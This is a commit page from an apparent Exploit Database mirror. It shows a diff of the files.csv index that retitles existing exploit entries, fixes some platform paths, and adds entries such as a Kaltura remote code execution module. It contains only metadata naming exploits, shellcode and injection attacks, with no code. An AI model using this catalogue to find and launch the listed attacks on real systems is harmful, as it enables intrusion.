bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-22

Browse source 
6 new exploits

Setuid perl - PerlIO_Debug() Root owned file creation
Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation

Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)

Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit
Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)

VideoCache 1.9.2 - vccleaner Root
VideoCache 1.9.2 - 'vccleaner' Privilege Escalation

UK One Media CMS - 'id' Error Based SQL Injection
UK One Media CMS - 'id' Error-Based SQL Injection

xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection
xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection

Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)
Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)

Ultimate eShop - Error Based SQL Injection
Ultimate eShop - Error-Based SQL Injection

WordPress Plugin Multiple - timthumb.php Vulnerabilities
Multiple WordPress Plugins - timthumb.php File Upload

Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service

Slackware Linux 3.5 - /etc/group missing results in Root access
Slackware Linux 3.5 - /etc/group Missing Privilege Escalation

Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service

Sudo 1.6.3 - Unclean Environment Variable Root Program Execution
Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation

Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure

Microsoft Office PowerPoint 2010 - Invalid Pointer Reference

Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write

sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass

Microweber 0.905 - Error Based SQL Injection
Microweber 0.905 - Error-Based SQL Injection

WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution
Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution
This commit is contained in:
Offensive Security 2016-09-22 05:06:28 +00:00
parent fdd9fd65e2
commit b8ebed3824
7 changed files with 221 additions and 18 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
files.csv
View file

@ -615,7 +615,7 @@ id,file,description,date,author,platform,type,port
789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667
790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
@ -2789,6 +2789,7 @@ id,file,description,date,author,platform,type,port
3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0
3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0
3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0
40404,platforms/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",php,remote,80
3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0
3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0
3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0
@ -8619,7 +8620,7 @@ id,file,description,date,author,platform,type,port
9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0
9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0
9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
@ -8946,7 +8947,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9009,7 +9010,7 @@ id,file,description,date,author,platform,type,port
9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
@ -9749,7 +9750,7 @@ id,file,description,date,author,platform,type,port
10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0
10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
14034,platforms/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local,0
10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Denial of Service Buffer Overflow",2009-12-16,Connection,windows,dos,0
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
@ -12280,7 +12281,7 @@ id,file,description,date,author,platform,type,port
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
@ -13115,7 +13116,7 @@ id,file,description,date,author,platform,type,port
15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos,0
15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection",2010-09-18,secret,php,webapps,0
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0
15040,platforms/php/webapps/15040.txt,"Joomla! Component com_restaurantguide - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
@ -14123,7 +14124,7 @@ id,file,description,date,author,platform,type,port
16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0
16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0
16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
@ -14967,7 +14968,7 @@ id,file,description,date,author,platform,type,port
17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0
17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0
17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error-Based SQL Injection",2011-04-20,Romka,php,webapps,0
17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0
17193,platforms/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
@ -15533,7 +15534,7 @@ id,file,description,date,author,platform,type,port
17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0
17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0
17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
17872,platforms/php/webapps/17872.txt,"WordPress Plugin Multiple - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0
17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0
@ -16522,12 +16523,12 @@ id,file,description,date,author,platform,type,port
19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23
19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0
19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0
19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0
19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0
19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group Missing Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
@ -16795,7 +16796,7 @@ id,file,description,date,author,platform,type,port
19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0
19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0
19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0
19423,platforms/multiple/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0
19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0
19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0
@ -18516,7 +18517,7 @@ id,file,description,date,author,platform,type,port
21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0
21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0
21226,platforms/linux/local/21226.c,"IMLib2 - Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution",2002-01-14,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",linux,local,0
21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos,0
21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local,0
21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0
@ -19399,7 +19400,7 @@ id,file,description,date,author,platform,type,port
22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0
22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0
22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0
22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,windows,dos,0
22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - Default_Theme Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps,0
22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0
@ -20240,6 +20241,7 @@ id,file,description,date,author,platform,type,port
22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0
22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0
22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0
40406,platforms/windows/dos/40406.txt,"Microsoft Office PowerPoint 2010 - Invalid Pointer Reference",2016-09-21,"Google Security Research",windows,dos,0
22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos,0
22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local,0
22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local,0
@ -20269,6 +20271,7 @@ id,file,description,date,author,platform,type,port
23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0
23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0
23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0
40405,platforms/multiple/dos/40405.txt,"Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0
23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0
23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0
23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0
@ -22303,7 +22306,7 @@ id,file,description,date,author,platform,type,port
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0
25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0
25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0
25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0
@ -26431,7 +26434,7 @@ id,file,description,date,author,platform,type,port
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0
29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0
29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
@ -30553,7 +30556,7 @@ id,file,description,date,author,platform,type,port
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
